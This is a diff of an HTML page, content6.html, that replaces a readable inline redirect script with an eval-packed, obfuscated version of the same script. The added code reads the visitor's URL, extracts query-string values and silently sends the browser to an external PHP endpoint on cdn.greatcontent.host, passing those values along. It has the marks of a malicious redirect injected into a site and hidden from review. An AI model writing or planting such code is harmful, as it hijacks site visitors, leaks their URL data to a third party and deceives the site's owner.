--- a/content6.html
+++ b/content6.html
@@ -1,17 +1,3 @@
 <script>
-var r = window.location.href;
-if(r.indexOf('?') !== -1) {
-	if(r.indexOf('&') > -1) {
-		var pg2 = r.substring(0, r.indexOf('&'));
-		var parts = pg2.split('?');
-		var k = parts[parts.length - 1]
-	} else {
-		var parts = r.split('?');
-		var k = parts[parts.length - 1]
-	}
-	var d = parts[parts.length - 2];
-	var p = Math.floor(Math.random() * 100) + 1;
-		var string1 = 'https://cdn.greatcontent.host/g/' + p + '.php?k=' + k + '&r=' + d;
-		window.location.href = string1
-}
+eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 5=e.f.9;c(5.6(\'?\')!==-1){c(5.6(\'&\')>-1){3 a=5.n(0,5.6(\'&\'));3 4=a.b(\'?\');3 k=4[4.7-1]}m{3 4=5.b(\'?\');3 k=4[4.7-1]}3 d=4[4.7-2];3 8=\'j://o.i.h/g/1.l?k=\'+k+\'&5=\'+d;e.f.9=8}',25,25,'|||var|parts|r|indexOf|length|string1|href|pg2|split|if||window|location||host|greatcontent|https||php|else|substring|cdn'.split('|'),0,{}))
 </script>
